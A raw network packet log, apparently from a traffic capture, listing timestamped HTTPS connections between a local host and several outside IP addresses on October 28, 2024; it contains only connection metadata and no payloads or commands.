                                                                                                                                                                            Oct 28, 2024 19:12:48.956180096 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.956377983 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.956396103 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.956861973 CET4435918513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.957170010 CET4435918513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.957222939 CET4435918513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.957269907 CET59185443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.960861921 CET59185443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.960869074 CET4435918513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.960881948 CET59185443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.960886002 CET4435918513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.962268114 CET4435918613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.962446928 CET4435918613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.962522984 CET59186443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.965756893 CET59186443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.965756893 CET59186443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.965779066 CET4435918613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.965799093 CET4435918613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.980190039 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.980221987 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.980357885 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.984756947 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.984777927 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.985281944 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.985291004 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:48.985367060 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.989608049 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:48.989620924 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.101067066 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.106281042 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.106292963 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.106652975 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.106663942 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.106714010 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.106719971 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.106758118 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.107358932 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.241923094 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.255835056 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.255970955 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.256309032 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.256318092 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.291235924 CET59189443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.305790901 CET59189443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.305802107 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.306340933 CET59189443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.306345940 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.306869984 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.367727041 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.367810965 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.367888927 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.368100882 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.368140936 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.438797951 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.438815117 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.438865900 CET59189443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.438882113 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.439191103 CET59189443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.439198017 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.439207077 CET59189443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.439209938 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.439218998 CET4435918913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.441961050 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.442002058 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.442065001 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.442233086 CET59196443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.442261934 CET4435919613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.506218910 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.506335020 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.506380081 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.506397009 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.509793997 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.509840012 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.509849072 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.518699884 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.518752098 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.518760920 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.527970076 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.528012037 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.528022051 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.571536064 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.571544886 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627681017 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627729893 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.627741098 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627902985 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.627947092 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.627954006 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.628067017 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.628114939 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.628122091 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631700993 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631742954 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.631752014 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631869078 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.631908894 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.631915092 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.640415907 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.640463114 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.640472889 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.647159100 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.647202969 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.647212029 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.656718016 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.656774044 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.656783104 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.665615082 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.665659904 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.665669918 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.673336029 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.673391104 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.673401117 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.742229939 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.742975950 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.742993116 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.743694067 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.743700027 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.768984079 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769068956 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769174099 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769258976 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769344091 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769428968 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769516945 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.769629002 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.770611048 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.770627975 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.770637035 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.770674944 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.770874977 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771230936 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771333933 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.771356106 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771471977 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.771503925 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771527052 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771564007 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.771570921 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771671057 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.771722078 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.771728039 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772232056 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772273064 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772313118 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.772319078 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772438049 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.772444963 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772444963 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.772479057 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.772485971 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773159981 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.773189068 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773322105 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773365974 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.773371935 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773472071 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.773504972 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.773511887 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774019957 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.774034023 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774183035 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774229050 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.774236917 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774333954 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.774369955 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.774375916 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778584957 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778631926 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.778640032 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778737068 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.778775930 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.778780937 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.780343056 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.780641079 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.780649900 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.781188011 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.781193972 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.786981106 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.787045956 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.787055016 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.788256884 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.788299084 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.788306952 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.796046019 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.796097040 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.796108007 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.873750925 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.873809099 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.873820066 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.874324083 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.874371052 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.874382019 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.874454975 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.874510050 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.874516010 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.874596119 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.874634027 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.874639034 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.875058889 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.875106096 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.875113010 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.875193119 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.875242949 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.875248909 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.876053095 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.876099110 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.876106024 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.876203060 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.876249075 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.876254082 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.876358032 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.876390934 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.876395941 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877298117 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877346992 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.877353907 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877459049 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877496004 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.877501965 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877610922 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877652884 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.877659082 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877778053 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.877823114 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.877827883 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.878695965 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.878743887 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.878748894 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.878844023 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.878885984 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.878891945 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.878988981 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.879031897 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.879036903 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.879108906 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.879183054 CET44359188172.217.16.193192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.879234076 CET59188443192.168.2.4172.217.16.193
                                                                                                                                                                            Oct 28, 2024 19:12:49.895705938 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.897104979 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.897165060 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.897290945 CET59193443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.897306919 CET4435919313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.901982069 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.902010918 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.902057886 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.902479887 CET59197443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.902492046 CET4435919713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.909816980 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.909949064 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.910011053 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.910037041 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.910037041 CET59194443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.910053015 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.910063028 CET4435919413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.913362026 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.913405895 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.913465977 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.913657904 CET59198443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.913686991 CET4435919813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.914769888 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.914822102 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.914871931 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.914877892 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.914917946 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.915085077 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.915102959 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.915127039 CET59191443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.915134907 CET4435919113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.918749094 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.918768883 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.918828964 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.919125080 CET59199443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.919135094 CET4435919913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.926873922 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.926954985 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.927004099 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.927015066 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.927057981 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.927079916 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.927093983 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.927104950 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.927109957 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.927123070 CET59192443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.927126884 CET4435919213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.931190014 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.931210041 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:49.931256056 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.931380987 CET59200443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:49.931396961 CET4435920013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.105649948 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.106055975 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.106105089 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.109499931 CET4435919513.107.246.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:50.109579086 CET59195443192.168.2.413.107.246.45
                                                                                                                                                                            Oct 28, 2024 19:12:50.110687017 CET59195443192.168.2.413.107.246.45
